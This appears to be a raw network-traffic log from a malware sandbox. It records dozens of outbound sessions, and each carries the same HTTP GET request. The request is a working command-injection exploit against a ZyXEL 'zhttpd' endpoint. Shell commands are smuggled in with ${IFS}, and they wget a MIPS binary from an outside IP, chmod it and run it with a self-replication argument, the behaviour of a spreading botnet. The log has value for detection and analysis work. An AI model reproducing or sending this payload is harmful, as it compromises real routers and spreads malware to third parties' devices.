                                                Jan 12, 2024 18:16:28.594347954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5891192.168.2.2333552203.220.85.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594377041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5892192.168.2.234285843.108.213.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594444036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5893192.168.2.235186478.239.146.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594501972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5894192.168.2.2352194198.27.167.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594558954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5895192.168.2.2360994130.110.26.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594610929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5896192.168.2.234532261.116.92.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.594657898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5897192.168.2.2349408102.115.120.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598027945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5898192.168.2.2336786122.208.188.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598073959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5899192.168.2.2353062112.146.195.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598100901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5900192.168.2.234015641.38.175.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598159075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5901192.168.2.236006474.26.152.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598217964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5902192.168.2.2346690154.126.47.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598239899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5903192.168.2.234128280.100.171.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598254919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5904192.168.2.2351608182.106.1.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598306894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5905192.168.2.2339144196.136.86.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598355055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5906192.168.2.235274095.100.153.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598412991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5907192.168.2.2349650105.78.177.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598436117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5908192.168.2.2344702205.62.75.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598460913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5909192.168.2.2343890143.178.26.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598500967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5910192.168.2.2345024172.52.10.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598526955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5911192.168.2.2349868182.39.146.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598565102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5912192.168.2.235626253.4.74.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598619938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5913192.168.2.2337244195.65.163.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598654032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5914192.168.2.2351790113.189.21.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598730087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5915192.168.2.2333656160.143.78.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598754883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5916192.168.2.2335854106.146.83.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598820925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5917192.168.2.2343874159.228.23.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598858118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5918192.168.2.2338756102.197.57.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598896027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5919192.168.2.2335312125.228.181.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598921061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5920192.168.2.2359148197.241.24.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598978996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5921192.168.2.2349024115.166.176.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.598997116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5922192.168.2.2340162206.208.145.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599020004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5923192.168.2.235477077.99.76.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599071026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5924192.168.2.2353086116.245.132.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599107981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5925192.168.2.2358026167.94.57.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599188089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5926192.168.2.235521654.18.126.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599225044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5927192.168.2.2351250131.250.34.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599261045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5928192.168.2.234275875.49.113.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599306107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5929192.168.2.2358098138.54.110.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599334955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5930192.168.2.233628694.182.16.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599395037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5931192.168.2.234937645.126.233.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599436045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5932192.168.2.2358966179.51.251.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599478960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5933192.168.2.234125217.175.132.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599504948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5934192.168.2.2349176189.197.119.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599561930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5935192.168.2.2355638117.159.203.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599594116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5936192.168.2.2359836177.183.226.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599652052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5937192.168.2.2358046105.94.184.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599692106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5938192.168.2.233829891.127.210.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599745035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5939192.168.2.2358236145.9.241.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599771023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5940192.168.2.234394696.225.213.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599821091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5941192.168.2.2343490164.154.106.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599853992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5942192.168.2.2345298117.214.146.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599909067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5943192.168.2.23529788.151.136.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599934101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5944192.168.2.2341200147.47.93.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.599999905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5945192.168.2.235617071.161.4.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600023985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5946192.168.2.2347730178.103.55.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600066900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5947192.168.2.234383445.87.116.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600100994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5948192.168.2.233487057.236.58.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600116014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5949192.168.2.2334924207.210.50.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600178957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5950192.168.2.2342426133.25.37.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600198984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5951192.168.2.233797839.242.13.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600246906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5952192.168.2.2338536124.126.138.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.600291967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5953192.168.2.2342972116.228.113.106443
                                                TimestampBytes transferredDirectionData
